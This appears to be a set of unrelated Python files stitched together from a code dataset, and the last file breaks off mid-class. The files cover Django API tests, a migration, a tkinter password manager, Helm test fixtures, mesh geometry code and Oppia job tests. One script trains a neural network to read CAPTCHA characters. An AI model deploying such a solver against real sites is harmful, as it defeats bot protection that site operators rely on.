def test_user_exists(self):
payload = {
'email': '[email protected]',
'password': '[email protected]'
}
res: Response = self.client.post(CREATE_USER_URL, payload)
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
def test_password_too_short(self):
payload = {
'email': '[email protected]',
'password': 'pw',
'name': 'Test'
}
res: Response = self.client.post(CREATE_USER_URL, payload)
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
exists = User.objects.filter(email=payload['email']).exists()
self.assertFalse(exists)
def test_create_token_for_user(self):
payload = {
'email': '[email protected]',
'password': '[email protected]'
}
create_user(**payload)
res: Response = self.client.post(CREATE_TOKEN_URL, payload)
self.assertIn('token', res.data)
self.assertEqual(res.status_code, status.HTTP_200_OK)
def test_create_token_invalid_credentials(self):
create_user(email="[email protected]", password="mypass")
payload = {
'email': '[email protected]',
'password': 'wrong pass'
}
res: Response = self.client.post(CREATE_TOKEN_URL, payload)
self.assertNotIn('token', res.data)
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
def test_create_token_no_user(self):
payload = {
'email': '[email protected]',
'password': 'mypassword'
}
res: Response = self.client.post(CREATE_TOKEN_URL, payload)
self.assertNotIn('token', res.data)
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
def test_create_token_missing_field(self):
res: Response = self.client.post(
CREATE_TOKEN_URL,
{'email': 'one', 'password': ''}
)
self.assertNotIn('token', res.data)
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
def test_retrieve_user_unauthorized(self):
res: Response = self.client.get(ME_URL)
self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)
class PrivateUserApiTests(TestCase):
def setUp(self) -> None:
self.user = create_user(
email="[email protected]",
password="password",
name="testuser",
)
self.client = APIClient()
self.client.force_authenticate(user=self.user)
def test_retrieve_profile_user(self):
res = self.client.get(ME_URL)
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.assertEqual(res.data, {
'name': self.user.name,
'email': self.user.email
})
def test_post_me_not_allowed(self):
res = self.client.post(ME_URL, {})
self.assertEqual(res.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
def test_update_user_profile(self):
payload = {
'email': '[email protected]',
'password': 'newwpassword',
'name': 'newname'
}
res = self.client.patch(ME_URL, payload)
self.user.refresh_from_db()
self.assertEqual(self.user.name, payload['name'])
self.assertEqual(self.user.email, payload['email'])
self.assertTrue(self.user.check_password(payload['password']))
self.assertEqual(res.status_code, status.HTTP_200_OK)
|
py | 1a49fd9c8df98ddbc4403be55f9bc5b13c8149f8 | # Generated by Django 2.0.1 on 2018-03-21 16:58
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('materials', '0024_auto_20180321_1512'),
]
operations = [
migrations.AlterField(
model_name='idinfo',
name='data_extraction_method',
field=models.CharField(max_length=500),
),
migrations.AlterField(
model_name='idinfo',
name='source',
field=models.CharField(max_length=500),
),
]
|
py | 1a49fdbebb6a4177f6b84f68acc2ccaedf7a2805 | import cv2
import pickle
import os.path
import numpy as np
from imutils import paths
from sklearn.preprocessing import LabelBinarizer
from sklearn.model_selection import train_test_split
from keras.models import Sequential
from keras.layers.convolutional import Conv2D, MaxPooling2D
from keras.layers.core import Flatten, Dense
#from helpers import resize_to_fit
LETTER_IMAGES_FOLDER = "extracted_letter_images"
MODEL_FILENAME = "captcha_model.hdf5"
MODEL_LABELS_FILENAME = "model_labels.dat"
# initialize the data and labels
data = []
labels = []
# loop over the input images
for image_file in paths.list_images(LETTER_IMAGES_FOLDER):
# Load the image and convert it to grayscale
image = cv2.imread(image_file)
#image = cv2.threshold(image, 195, 255, cv2.THRESH_BINARY)[1]
image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
image = cv2.threshold(image, 195, 255, cv2.THRESH_BINARY)[1]
#cv2.imshow('ImageWindow', image)
#cv2.waitKey()
# Add a third channel dimension to the image to make Keras happy
image = list(np.expand_dims(image, axis=2))
print(np.array(image).shape)
    # Grab the letter label from the first character of the image file name
label = image_file.split(os.path.sep)[-1][0]
    # Add the letter image and its label to our training data
data.append(image)
labels.append(label)
#print('data', data)
#print('labels', labels)
# scale the raw pixel intensities to the range [0, 1] (this improves training)
data = np.array(data, dtype="float") / 255
labels = np.array(labels)
# Split the training data into separate train and test sets
(X_train, X_test, Y_train, Y_test) = train_test_split(data, labels, test_size=0.25, random_state=0)
# Convert the labels (letters) into one-hot encodings that Keras can work with
lb = LabelBinarizer().fit(Y_train)
Y_train = lb.transform(Y_train)
Y_test = lb.transform(Y_test)
# Save the mapping from labels to one-hot encodings.
# We'll need this later when we use the model to decode what it's predictions mean
with open(MODEL_LABELS_FILENAME, "wb") as f:
pickle.dump(lb, f)
# Build the neural network!
model = Sequential()
# First convolutional layer with max pooling
model.add(Conv2D(20, (5, 5), padding="same", input_shape=(60, 40, 1), activation="relu"))
model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))
# Second convolutional layer with max pooling
model.add(Conv2D(50, (5, 5), padding="same", activation="relu"))
model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))
# Hidden layer with 500 nodes
model.add(Flatten())
model.add(Dense(500, activation="relu"))
# Output layer with 28 nodes (one for each possible letter/number we predict)
model.add(Dense(28, activation="softmax"))
# Ask Keras to build the TensorFlow model behind the scenes
model.compile(loss="categorical_crossentropy", optimizer="adam", metrics=["accuracy"])
#print(X_train)
print(np.array(X_train).shape)
print(np.array(Y_train).shape)
# Train the neural network
model.fit(np.array(X_train), np.array(Y_train), validation_data=(X_test, Y_test), batch_size=3, epochs=10, verbose=1)
# Save the trained model to disk
model.save(MODEL_FILENAME)
|
py | 1a49fdf71595ced30cdb991b300a6613a3292390 | from tkinter import *
from tkinter import messagebox
from scripts import data_manager
from scripts import password_generator
import pyperclip
BACKGROUND_COLOUR = '#495664'
FOREGROUND_COLOUR = '#f6f7d3'
DARK_TEXT_COLOUR = '#333c4a'
class UI:
def __init__(self):
# Init objects
self.data_manager_obj = data_manager.DataManager()
# Setup files if first start
if self.data_manager_obj.is_first_start():
self.data_manager_obj.setup_obj.run_setup()
# Create login window if not first start
if not self.data_manager_obj.is_first_start():
self.login_window = Tk()
self.login_window.title('Login to Password Manager')
self.login_window.config(padx=60, pady=50, bg=BACKGROUND_COLOUR)
# Master user credentials
self.master_username = StringVar()
self.master_password = StringVar()
# Init other variables required
self.main_window = None
self.main_image = None
self.symbols_checked = None
self.letters_checked = None
self.numbers_checked = None
self.spinbox_pass_length = None
self.add_new_tag = None
self.add_new_username = None
self.add_new_pass = None
self.select_tag = None
self.tags_option_menu = None
self.user_listbox = None
self.pass_listbox = None
# Init login window objects
self.init_login_window()
self.login_window.mainloop()
def init_login_window(self):
user_label = Label(text='Username: ', bg=BACKGROUND_COLOUR, fg=FOREGROUND_COLOUR, pady=20)
user_label.grid(row=0, column=0)
user_entry = Entry(width=30, textvariable=self.master_username)
user_entry.grid(row=0, column=1)
pass_label = Label(text='Password: ', bg=BACKGROUND_COLOUR, fg=FOREGROUND_COLOUR, pady=20)
pass_label.grid(row=1, column=0)
pass_entry = Entry(width=30, textvariable=self.master_password, show='*')
pass_entry.grid(row=1, column=1)
go_btn = Button(text='Go', bg=BACKGROUND_COLOUR, fg=FOREGROUND_COLOUR, command=self.login_pressed, pady=10)
go_btn.grid(row=2, column=2)
user_entry.focus()
def login_pressed(self):
username = self.master_username.get()
password = self.master_password.get()
if username and password:
self.master_username.set('')
self.master_password.set('')
check_username, check_password = self.data_manager_obj.get_master_details()
if str(check_username) == str(username):
if str(check_password) == str(password):
self.create_main_window()
else:
messagebox.showerror(title='Incorrect', message='Please check the password.')
else:
messagebox.showerror(title='Incorrect', message='Please check the username.')
else:
messagebox.showerror(title='Empty field(s)?', message='Please don\'t leave any field(s) empty.')
def create_main_window(self):
self.login_window.destroy()
self.main_window = Tk()
self.main_window.title('Password Manager')
self.main_window.config(padx=50, pady=50, bg=BACKGROUND_COLOUR)
main_canvas = Canvas(width=600, height=600)
main_canvas.config(bg=BACKGROUND_COLOUR, highlightthickness=0)
self.main_image = PhotoImage(file='images/password-manager.png')
main_canvas.create_image(300, 300, image=self.main_image)
main_canvas.grid(row=0, column=1)
tags_label = Label(text='TAG:', bg=BACKGROUND_COLOUR, fg=FOREGROUND_COLOUR, pady=50)
tags_label.grid(row=1, column=0)
self.select_tag = StringVar()
tags_list = self.data_manager_obj.get_saved_password_tags()
self.tags_option_menu = OptionMenu(self.main_window, self.select_tag, *tags_list)
self.select_tag.set(tags_list[0])
self.tags_option_menu.grid(row=1, column=1)
search_btn = Button(text='Search', bg=BACKGROUND_COLOUR, fg=FOREGROUND_COLOUR, pady=10,
command=self.list_passwords_clicked)
search_btn.grid(row=1, column=3)
add_btn = Button(text='Add a new entry', bg=BACKGROUND_COLOUR, fg=FOREGROUND_COLOUR, pady=10,
command=self.add_new_password_clicked)
add_btn.grid(row=2, column=0)
gen_pass_btn = Button(text='Generate Password', bg=BACKGROUND_COLOUR, fg=FOREGROUND_COLOUR, pady=10,
command=self.generate_password_clicked)
gen_pass_btn.grid(row=2, column=1)
def list_passwords_clicked(self):
self.create_list_pass_window(master=self.main_window)
def create_list_pass_window(self, master):
list_pass_window = Toplevel(master=master)
tag_choice = str(self.select_tag.get()).lower()
list_pass_window.title(f'List of passwords for {tag_choice}')
list_pass_window.config(padx=50, pady=50, bg=BACKGROUND_COLOUR)
        instruct_label = Label(master=list_pass_window, text='Click on item to copy', bg=BACKGROUND_COLOUR,
                               fg=FOREGROUND_COLOUR, pady=10)
        instruct_label.grid(row=0, column=0)
count, user_list, pass_list = self.data_manager_obj.get_all_passwords(tag_choice)
self.user_listbox = Listbox(master=list_pass_window, height=count)
for i in range(count):
self.user_listbox.insert(i, user_list[i])
self.user_listbox.grid(row=1, column=0)
self.pass_listbox = Listbox(master=list_pass_window, height=count)
for i in range(count):
self.pass_listbox.insert(i, pass_list[i])
self.pass_listbox.grid(row=1, column=1)
self.user_listbox.bind("<<ListboxSelect>>", self.user_listbox_used)
self.pass_listbox.bind("<<ListboxSelect>>", self.pass_listbox_used)
def user_listbox_used(self, event):
if self.user_listbox.curselection():
pyperclip.copy(self.user_listbox.get(self.user_listbox.curselection()))
messagebox.showinfo(title='Copied',
message='Copied this item!')
def pass_listbox_used(self, event):
if self.pass_listbox.curselection():
pyperclip.copy(self.pass_listbox.get(self.pass_listbox.curselection()))
messagebox.showinfo(title='Copied',
message='Copied this item!')
def generate_password_clicked(self):
self.create_gen_pass_window(master=self.main_window)
def create_gen_pass_window(self, master):
generate_pass_window = Toplevel(master=master)
generate_pass_window.title('Generate a new password')
generate_pass_window.config(padx=50, pady=50, bg=BACKGROUND_COLOUR)
self.symbols_checked = IntVar()
self.letters_checked = IntVar()
self.numbers_checked = IntVar()
symbols_check = Checkbutton(master=generate_pass_window, text='Symbols', variable=self.symbols_checked, pady=10)
symbols_check.config(bg=BACKGROUND_COLOUR, highlightthickness=0)
symbols_check.grid(row=0, column=0)
letters_check = Checkbutton(master=generate_pass_window, text='Letters', variable=self.letters_checked, pady=10)
letters_check.config(bg=BACKGROUND_COLOUR, highlightthickness=0)
letters_check.grid(row=1, column=0)
numbers_check = Checkbutton(master=generate_pass_window, text='Numbers', variable=self.numbers_checked, pady=10)
numbers_check.config(bg=BACKGROUND_COLOUR, highlightthickness=0)
numbers_check.grid(row=2, column=0)
self.spinbox_pass_length = Spinbox(master=generate_pass_window, from_=8, to=128, width=5)
self.spinbox_pass_length.grid(row=3, column=0)
go_btn = Button(master=generate_pass_window, text='Go', bg=BACKGROUND_COLOUR, fg=FOREGROUND_COLOUR,
command=self.generate_password, pady=10)
go_btn.grid(row=4, column=1)
def generate_password(self):
symbols = self.symbols_checked.get()
letters = self.letters_checked.get()
numbers = self.numbers_checked.get()
pass_length = self.spinbox_pass_length.get()
password = password_generator.generate_password(has_symbols=bool(symbols),
has_letters=bool(letters),
has_numbers=bool(numbers),
pass_length=int(pass_length))
messagebox.showinfo(title='Password Generated!',
message=f'Password is copied to clipboard! \nYour password is: {password}')
def add_new_password_clicked(self):
self.create_add_new_password_window(master=self.main_window)
def create_add_new_password_window(self, master):
add_new_pass_window = Toplevel(master=master)
add_new_pass_window.title('Add a new password entry')
add_new_pass_window.config(padx=50, pady=50, bg=BACKGROUND_COLOUR)
tag_label = Label(master=add_new_pass_window, text='TAG: ', bg=BACKGROUND_COLOUR, fg=FOREGROUND_COLOUR, pady=20)
tag_label.grid(row=0, column=0)
self.add_new_tag = StringVar()
tag_entry = Entry(master=add_new_pass_window, width=30, textvariable=self.add_new_tag)
tag_entry.grid(row=0, column=1)
user_label = Label(master=add_new_pass_window, text='USERNAME: ', bg=BACKGROUND_COLOUR, fg=FOREGROUND_COLOUR,
pady=20)
user_label.grid(row=1, column=0)
self.add_new_username = StringVar()
user_entry = Entry(master=add_new_pass_window, width=30, textvariable=self.add_new_username)
user_entry.grid(row=1, column=1)
pass_label = Label(master=add_new_pass_window, text='PASSWORD: ', bg=BACKGROUND_COLOUR, fg=FOREGROUND_COLOUR,
pady=20)
pass_label.grid(row=2, column=0)
self.add_new_pass = StringVar()
pass_entry = Entry(master=add_new_pass_window, width=30, textvariable=self.add_new_pass)
pass_entry.grid(row=2, column=1)
add_pass_btn = Button(master=add_new_pass_window, text='Add this password', bg=BACKGROUND_COLOUR,
fg=FOREGROUND_COLOUR, pady=10, command=self.password_add_clicked)
add_pass_btn.grid(row=3, column=1)
def password_add_clicked(self):
tag_value = str(self.add_new_tag.get())
user_value = str(self.add_new_username.get())
pass_value = str(self.add_new_pass.get())
if tag_value and user_value and pass_value:
tag_value = tag_value.lower()
is_okay = messagebox.askokcancel(title='Confirm save?',
message=f'Are you sure you want to proceed with this info?\n' +
f'Tag: {tag_value}\n' +
f'Username: {user_value}\n' +
f'Password: {pass_value}')
if is_okay:
self.data_manager_obj.add_new_password(tag=tag_value, user=user_value, password=pass_value)
messagebox.showinfo(title='Success!',
message='The save operation was successful!')
# Refresh tags list in the main app screen
self.tags_option_menu['menu'].delete(0, "end")
for string in self.data_manager_obj.get_saved_password_tags():
self.tags_option_menu['menu'].add_command(label=string,
command=lambda value=string: self.select_tag.set(value))
self.add_new_tag.set('')
self.add_new_username.set('')
self.add_new_pass.set('')
else:
self.add_new_tag.set('')
self.add_new_username.set('')
self.add_new_pass.set('')
|
py | 1a49fec113adcfc587f9911de0206ae0cef78c47 | """
Setup script for libanac
"""
import sys
from setuptools import setup
import libanac
install_requires = [
'beautifulsoup4',
'requests',
]
if sys.version_info[:2] < (2, 7):
install_requires.append('argparse')
setup(
name=libanac.__title__,
description=libanac.__summary__,
long_description=open('README.rst').read(),
url=libanac.__url__,
author=libanac.__author__,
author_email=libanac.__email__,
license=libanac.__license__,
version=libanac.__version__,
packages=['libanac'],
test_suite='tests',
platforms='any',
keywords=['ANAC', 'SACI', 'CIV Digital'],
classifiers=[
'Natural Language :: English',
'Operating System :: MacOS :: MacOS X',
'Operating System :: POSIX',
'Operating System :: POSIX :: BSD',
'Operating System :: POSIX :: Linux',
'Operating System :: Microsoft :: Windows',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: Implementation :: CPython',
],
install_requires=install_requires,
)
|
py | 1a49fee823ddf65671bea3a5b936f38b52ac7c49 | # Copyright 2022 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
from textwrap import dedent
from pants.backend.helm.util_rules.chart_metadata import DEFAULT_API_VERSION, ChartType
def gen_chart_file(
name: str,
*,
version: str,
description: str | None = None,
type: ChartType = ChartType.APPLICATION,
api_version: str = DEFAULT_API_VERSION,
icon: str | None = None,
) -> str:
metadata_yaml = dedent(
f"""\
apiVersion: {api_version}
name: {name}
version: {version}
type: {type.value}
"""
)
if description:
metadata_yaml += f"description: {description}\n"
if icon:
metadata_yaml += f"icon: {icon}\n"
return metadata_yaml
HELM_CHART_FILE = gen_chart_file("mychart", version="0.1.0")
HELM_CHART_WITH_DEPENDENCIES_FILE = dedent(
"""\
apiVersion: v2
name: mychart
description: A Helm chart for Kubernetes
version: 0.1.0
icon: https://www.example.com/icon.png
dependencies:
- name: other_chart
repository: "@myrepo"
version: "~0.1.0"
alias: dependency_alias
"""
)
HELM_CHART_FILE_V1_FULL = dedent(
"""\
name: foo
version: 0.1.0
kubeVersion: 1.17
description: The foo chart
keywords:
- foo
- chart
home: https://example.com
sources:
- https://example.com/git
dependencies:
- name: bar
version: 0.2.0
repository: https://example.com/repo
condition: bar.enabled
tags:
- foo
- bar
import-values:
- data
alias: bar-alias
maintainers:
- name: foo
email: [email protected]
url: https://example.com/foo
icon: https://example.com/icon.png
appVersion: 0.1.0
deprecated: true
annotations:
example: yes
name: foo
"""
)
HELM_CHART_FILE_V2_FULL = dedent(
"""\
apiVersion: v2
name: quxx
version: 0.1.0
kubeVersion: 1.17
description: The foo chart
type: library
keywords:
- foo
- chart
home: https://example.com
sources:
- https://example.com/git
dependencies:
- name: bar
version: 0.2.0
repository: https://example.com/repo
condition: bar.enabled
tags:
- foo
- bar
import-values:
- data
alias: bar-alias
maintainers:
- name: foo
email: [email protected]
url: https://example.com/foo
icon: https://example.com/icon.png
appVersion: 0.1.0
deprecated: true
annotations:
example: yes
name: quxx
"""
)
K8S_SERVICE_FILE = dedent(
"""\
apiVersion: v1
kind: Service
metadata:
name: {{ template "fullname" . }}
labels:
chart: "{{ .Chart.Name }}-{{ .Chart.Version | replace "+" "_" }}"
spec:
type: {{ .Values.service.type }}
ports:
- port: {{ .Values.service.externalPort }}
targetPort: {{ .Values.service.internalPort }}
protocol: TCP
name: {{ .Values.service.name }}
selector:
app: {{ template "fullname" . }}
"""
)
K8S_INGRESS_FILE_WITH_LINT_WARNINGS = dedent(
"""\
apiVersion: extensions/v1beta1
kind: Ingress
metadata:
name: {{ template "fullname" . }}
labels:
chart: "{{ .Chart.Name }}-{{ .Chart.Version | replace "+" "_" }}"
spec:
rules:
- host: example.com
http:
paths:
- path: /
pathType: Prefix
backend:
service:
name: {{ template "fullname" . }}
port:
name: http
"""
)
K8S_POD_FILE = dedent(
"""\
apiVersion: v1
kind: Pod
metadata:
name: {{ template "fullname" . }}
labels:
chart: "{{ .Chart.Name }}-{{ .Chart.Version | replace "+" "_" }}"
spec:
containers:
- name: myapp-container
image: busybox:1.28
initContainers:
- name: init-service
image: busybox:1.29
"""
)
K8S_CRD_FILE = dedent(
"""\
apiVersion: apiextensions.k8s.io/v1
kind: CustomResourceDefinition
metadata:
# name must match the spec fields below, and be in the form: <plural>.<group>
name: myplatforms.contoso.com
spec:
# group name to use for REST API: /apis/<group>/<version>
group: contoso.com
names:
# plural name to be used in the URL: /apis/<group>/<version>/<plural>
plural: myplatforms
# singular name to be used as an alias on the CLI and for display
singular: myplatform
# kind is normally the CamelCased singular type. Your resource manifests use this.
kind: MyPlatform
# shortNames allow shorter string to match your resource on the CLI
shortNames:
- myp
# either Namespaced or Cluster
scope: Namespaced
versions:
- name: v1alpha1
# Each version can be enabled/disabled by Served flag.
served: true
# One and only one version must be marked as the storage version.
storage: true
schema:
openAPIV3Schema:
type: object
properties:
spec:
type: object
properties:
appId:
type: string
language:
type: string
enum:
- csharp
- python
- go
os:
type: string
enum:
- windows
- linux
instanceSize:
type: string
enum:
- small
- medium
- large
environmentType:
type: string
enum:
- dev
- test
- prod
replicas:
type: integer
minimum: 1
required: ["appId", "language", "environmentType"]
required: ["spec"]
"""
)
HELM_TEMPLATE_HELPERS_FILE = dedent(
"""\
{{- define "fullname" -}}
{{- if .Values.fullnameOverride }}
{{- .Values.fullnameOverride | trunc 63 | trimSuffix "-" }}
{{- else }}
{{- $name := default .Chart.Name .Values.nameOverride }}
{{- if contains $name .Release.Name }}
{{- .Release.Name | trunc 63 | trimSuffix "-" }}
{{- else }}
{{- printf "%s-%s" .Release.Name $name | trunc 63 | trimSuffix "-" }}
{{- end }}
{{- end }}
{{- end }}
"""
)
HELM_VALUES_FILE = dedent(
"""\
service:
name: test
type: ClusterIP
externalPort: 80
internalPort: 1223
"""
)
|
py | 1a49ff20557ebbf65340bfac316b608f6849bab4 | import numpy as np
from .triangle_hash import TriangleHash as _TriangleHash
def check_mesh_contains(mesh, points, hash_resolution=512):
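    """Return a boolean mask marking which of `points` lie inside `mesh` (assumed watertight)."""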
intersector = MeshIntersector(mesh, hash_resolution)
contains = intersector.query(points)
return contains
class MeshIntersector:
def __init__(self, mesh, resolution=512):
triangles = mesh.vertices[mesh.faces].astype(np.float64)
n_tri = triangles.shape[0]
self.resolution = resolution
self.bbox_min = triangles.reshape(3 * n_tri, 3).min(axis=0)
self.bbox_max = triangles.reshape(3 * n_tri, 3).max(axis=0)
        # Translate and scale it to [0.5, self.resolution - 0.5]^3
self.scale = (resolution - 1) / (self.bbox_max - self.bbox_min)
self.translate = 0.5 - self.scale * self.bbox_min
self._triangles = triangles = self.rescale(triangles)
# assert(np.allclose(triangles.reshape(-1, 3).min(0), 0.5))
# assert(np.allclose(triangles.reshape(-1, 3).max(0), resolution - 0.5))
triangles2d = triangles[:, :, :2]
self._tri_intersector2d = TriangleIntersector2d(
triangles2d, resolution)
def query(self, points):
# Rescale points
points = self.rescale(points)
# placeholder result with no hits we'll fill in later
        contains = np.zeros(len(points), dtype=bool)
# cull points outside of the axis aligned bounding box
# this avoids running ray tests unless points are close
inside_aabb = np.all((0 <= points) & (points <= self.resolution), axis=1)
if not inside_aabb.any():
return contains
# Only consider points inside bounding box
mask = inside_aabb
points = points[mask]
# Compute intersection depth and check order
points_indices, tri_indices = self._tri_intersector2d.query(points[:, :2])
triangles_intersect = self._triangles[tri_indices]
points_intersect = points[points_indices]
depth_intersect, abs_n_2 = self.compute_intersection_depth(points_intersect, triangles_intersect)
# Count number of intersections in both directions
smaller_depth = depth_intersect >= points_intersect[:, 2] * abs_n_2
bigger_depth = depth_intersect < points_intersect[:, 2] * abs_n_2
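        # Both sides stay scaled by |n_z|, so no division by (possibly tiny) normals is needed;
        # the parity of crossings above and below each point decides containment.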
points_indices_0 = points_indices[smaller_depth]
points_indices_1 = points_indices[bigger_depth]
nintersect0 = np.bincount(points_indices_0, minlength=points.shape[0])
nintersect1 = np.bincount(points_indices_1, minlength=points.shape[0])
# Check if point contained in mesh
contains1 = (np.mod(nintersect0, 2) == 1)
contains2 = (np.mod(nintersect1, 2) == 1)
if (contains1 != contains2).any():
print('Warning: contains1 != contains2 for some points.')
contains[mask] = (contains1 & contains2)
return contains
def compute_intersection_depth(self, points, triangles):
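        # For each (point, triangle) pair, find where the vertical ray through the point meets the
        # triangle's plane. The returned value is that z-coordinate scaled by |n_z| (the z component
        # of the plane normal), together with |n_z|, so callers can compare depths without dividing.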
t1 = triangles[:, 0, :]
t2 = triangles[:, 1, :]
t3 = triangles[:, 2, :]
v1 = t3 - t1
v2 = t2 - t1
# v1 = v1 / np.linalg.norm(v1, axis=-1, keepdims=True)
# v2 = v2 / np.linalg.norm(v2, axis=-1, keepdims=True)
normals = np.cross(v1, v2)
alpha = np.sum(normals[:, :2] * (t1[:, :2] - points[:, :2]), axis=1)
n_2 = normals[:, 2]
t1_2 = t1[:, 2]
s_n_2 = np.sign(n_2)
abs_n_2 = np.abs(n_2)
mask = (abs_n_2 != 0)
depth_intersect = np.full(points.shape[0], np.nan)
depth_intersect[mask] = \
t1_2[mask] * abs_n_2[mask] + alpha[mask] * s_n_2[mask]
# Test the depth:
# TODO: remove and put into tests
# points_new = np.concatenate([points[:, :2], depth_intersect[:, None]], axis=1)
# alpha = (normals * t1).sum(-1)
# mask = (depth_intersect == depth_intersect)
# assert(np.allclose((points_new[mask] * normals[mask]).sum(-1),
# alpha[mask]))
return depth_intersect, abs_n_2
def rescale(self, array):
array = self.scale * array + self.translate
return array
class TriangleIntersector2d:
def __init__(self, triangles, resolution=128):
self.triangles = triangles
self.tri_hash = _TriangleHash(triangles, resolution)
def query(self, points):
point_indices, tri_indices = self.tri_hash.query(points)
point_indices = np.array(point_indices, dtype=np.int64)
tri_indices = np.array(tri_indices, dtype=np.int64)
points = points[point_indices]
triangles = self.triangles[tri_indices]
mask = self.check_triangles(points, triangles)
point_indices = point_indices[mask]
tri_indices = tri_indices[mask]
return point_indices, tri_indices
def check_triangles(self, points, triangles):
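        # 2D point-in-triangle test: solve the 2x2 system A * [u, v]^T = y for barycentric-style
        # coordinates, keeping everything scaled by |det A| to avoid divisions. A point is strictly
        # inside when u > 0, v > 0 and u + v < |det A|.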
        contains = np.zeros(points.shape[0], dtype=bool)
A = triangles[:, :2] - triangles[:, 2:]
A = A.transpose([0, 2, 1])
y = points - triangles[:, 2]
detA = A[:, 0, 0] * A[:, 1, 1] - A[:, 0, 1] * A[:, 1, 0]
mask = (np.abs(detA) != 0.)
A = A[mask]
y = y[mask]
detA = detA[mask]
s_detA = np.sign(detA)
abs_detA = np.abs(detA)
u = (A[:, 1, 1] * y[:, 0] - A[:, 0, 1] * y[:, 1]) * s_detA
v = (-A[:, 1, 0] * y[:, 0] + A[:, 0, 0] * y[:, 1]) * s_detA
sum_uv = u + v
contains[mask] = (
(0 < u) & (u < abs_detA) & (0 < v) & (v < abs_detA)
& (0 < sum_uv) & (sum_uv < abs_detA)
)
return contains
|
py | 1a4a00a2dc4cfd9dd807ddda07cf2baa97567939 | # coding: utf-8
#
# Copyright 2021 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Unit tests for core.domain.beam_job_domain."""
from __future__ import absolute_import
from __future__ import unicode_literals
import datetime
from core.domain import beam_job_domain
from core.platform import models
from core.tests import test_utils
from jobs.batch_jobs import validation_jobs
import utils
(beam_job_models,) = models.Registry.import_models([models.NAMES.beam_job])
class BeamJobTests(test_utils.TestBase):
NOW = datetime.datetime.utcnow()
def test_usage(self):
job = beam_job_domain.BeamJob(validation_jobs.AuditAllStorageModelsJob)
self.assertEqual(job.name, 'AuditAllStorageModelsJob')
def test_in_terminal_state(self):
cancelled_beam_job_run = beam_job_domain.BeamJobRun(
'123', 'FooJob', beam_job_models.BeamJobState.CANCELLED.value,
self.NOW, self.NOW, True)
drained_beam_job_run = beam_job_domain.BeamJobRun(
'123', 'FooJob', beam_job_models.BeamJobState.DRAINED.value,
self.NOW, self.NOW, True)
updated_beam_job_run = beam_job_domain.BeamJobRun(
'123', 'FooJob', beam_job_models.BeamJobState.UPDATED.value,
self.NOW, self.NOW, True)
done_beam_job_run = beam_job_domain.BeamJobRun(
'123', 'FooJob', beam_job_models.BeamJobState.DONE.value,
self.NOW, self.NOW, True)
failed_beam_job_run = beam_job_domain.BeamJobRun(
'123', 'FooJob', beam_job_models.BeamJobState.FAILED.value,
self.NOW, self.NOW, True)
cancelling_beam_job_run = beam_job_domain.BeamJobRun(
'123', 'FooJob', beam_job_models.BeamJobState.CANCELLING.value,
self.NOW, self.NOW, True)
draining_beam_job_run = beam_job_domain.BeamJobRun(
'123', 'FooJob', beam_job_models.BeamJobState.DRAINING.value,
self.NOW, self.NOW, True)
pending_beam_job_run = beam_job_domain.BeamJobRun(
'123', 'FooJob', beam_job_models.BeamJobState.PENDING.value,
self.NOW, self.NOW, True)
running_beam_job_run = beam_job_domain.BeamJobRun(
'123', 'FooJob', beam_job_models.BeamJobState.RUNNING.value,
self.NOW, self.NOW, True)
stopped_beam_job_run = beam_job_domain.BeamJobRun(
'123', 'FooJob', beam_job_models.BeamJobState.STOPPED.value,
self.NOW, self.NOW, True)
unknown_beam_job_run = beam_job_domain.BeamJobRun(
'123', 'FooJob', beam_job_models.BeamJobState.UNKNOWN.value,
self.NOW, self.NOW, True)
self.assertTrue(cancelled_beam_job_run.in_terminal_state)
self.assertTrue(drained_beam_job_run.in_terminal_state)
self.assertTrue(updated_beam_job_run.in_terminal_state)
self.assertTrue(done_beam_job_run.in_terminal_state)
self.assertTrue(failed_beam_job_run.in_terminal_state)
self.assertFalse(cancelling_beam_job_run.in_terminal_state)
self.assertFalse(draining_beam_job_run.in_terminal_state)
self.assertFalse(pending_beam_job_run.in_terminal_state)
self.assertFalse(running_beam_job_run.in_terminal_state)
self.assertFalse(stopped_beam_job_run.in_terminal_state)
self.assertFalse(unknown_beam_job_run.in_terminal_state)
def test_to_dict(self):
job = beam_job_domain.BeamJob(validation_jobs.AuditAllStorageModelsJob)
self.assertEqual(job.to_dict(), {'name': 'AuditAllStorageModelsJob'})
class BeamJobRunTests(test_utils.TestBase):
NOW = datetime.datetime.utcnow()
def test_usage(self):
run = beam_job_domain.BeamJobRun(
'123', 'FooJob', 'RUNNING', self.NOW, self.NOW, True)
self.assertEqual(run.job_id, '123')
self.assertEqual(run.job_name, 'FooJob')
self.assertEqual(run.job_state, 'RUNNING')
self.assertEqual(run.job_started_on, self.NOW)
self.assertEqual(run.job_updated_on, self.NOW)
self.assertTrue(run.job_is_synchronous)
def test_to_dict(self):
run = beam_job_domain.BeamJobRun(
'123', 'FooJob', 'RUNNING', self.NOW, self.NOW, True)
self.assertEqual(run.to_dict(), {
'job_id': '123',
'job_name': 'FooJob',
'job_state': 'RUNNING',
'job_started_on_msecs': utils.get_time_in_millisecs(self.NOW),
'job_updated_on_msecs': utils.get_time_in_millisecs(self.NOW),
'job_is_synchronous': True,
})
class AggregateBeamJobRunResultTests(test_utils.TestBase):
def test_usage(self):
